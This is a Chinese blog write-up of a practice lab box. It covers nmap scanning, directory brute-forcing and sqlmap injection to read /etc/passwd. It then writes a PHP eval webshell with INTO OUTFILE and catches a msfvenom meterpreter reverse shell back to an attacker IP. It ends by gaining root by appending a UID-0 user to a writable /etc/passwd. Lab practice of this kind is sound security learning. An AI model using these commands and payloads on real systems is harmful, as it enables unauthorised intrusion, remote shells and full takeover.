IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> 记录一次靶机经过 -> 正文阅读

[PHP知识库]记录一次靶机经过

(1)扫描靶机ip

namp -sP ip/24

找出靶机ip

(2)拿到靶机ip扫描存活端口

nmap -sS -sV -T4 -A -p- ip

-sS(使用SYN进行扫描)

-sV(探测开启的端口来获取服务、版本信息)

-T4(数字越大,nmap扫描速度越快)

-A(一次扫描包含系统探测、版本探测、脚本扫描和跟踪扫描)、

(3)用drib或者dirsearch目录爆破

寻找①网站文件路径②敏感目录文件

(4)访问文件路径,看看网站的服务是什么,如果是数据库查询可以利用sqlmap注入

(5)bp抓包,保存文件(命名为uid.txt),利用slqmap扫描

sqlmap -r uid.txt --dbs(后续-D -T -C查看详细信息)

突破点:

①sqlmap -r uid.txt --file-read="/etc/passwd"(尝试读取passwd信息)

②sqlmap -r uid.txt --sql-shell

sql-shell> select @@datadir(获取数据库保存数据的位置)

③再次尝试读取/etc/passwd

sql-shell>

select load_file('/etc/passwd')

(6)php网站,可以寻找phpinfo文件的位置(存在网站物理路径)

存在文件上传的网站可能有写入权限

(7)在mysql写入webshell

①into outfile写入

sqlmap -r uid.txt --sql-query='select "<?php @eval($_POST[cmd]); ?>" INTO OUTFILE "/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/shell.php"'

②--file-dest写入

先用msfvenom生成木马

msfvenom -p php/meterpreter/reverse_tcp LHOST=攻击机ip LPORT=1234 R > shell.php

生成的木马记得打开删除前面的两个字符/*

(如果远程存在该文件,则无法写入。)

使用msfvenom接收反弹shell

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.108
set lport 1234
run

最后访问http://靶机IP/se3reTdir777/uploads/webshell.php进行shell反弹。

跳出meterpreter>?????? 输入shell即可

接下来涉及linux提权,暂时没有学习,以后记录

随笔:

>perl -le ‘print "hello world"'

hello world

需要学习:

①收集靶机内核版本uname -a

searchsploit linux 4.15

②SUID提权

③添加用户名密码到/etc/passwd

www-data用户具有/etc/passwd的可写权限。添加一个用户到/etc/passwd文件中

perl -le 'print crypt("Ai:Web:1.0","salt")'
echo "ins1ght:saPxWonD/gnR6:0:0:hacker:/root:/bin/bash" >> /etc/passwd
cat /etc/passwd | grep ins1ght

ins1ght
使用su ins1ght切换账户,密码是Ai:Web:1.0
?

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-03-30 18:02:46  更:2022-03-30 18:04:18 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年5日历 -2024/5/18 15:23:00-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码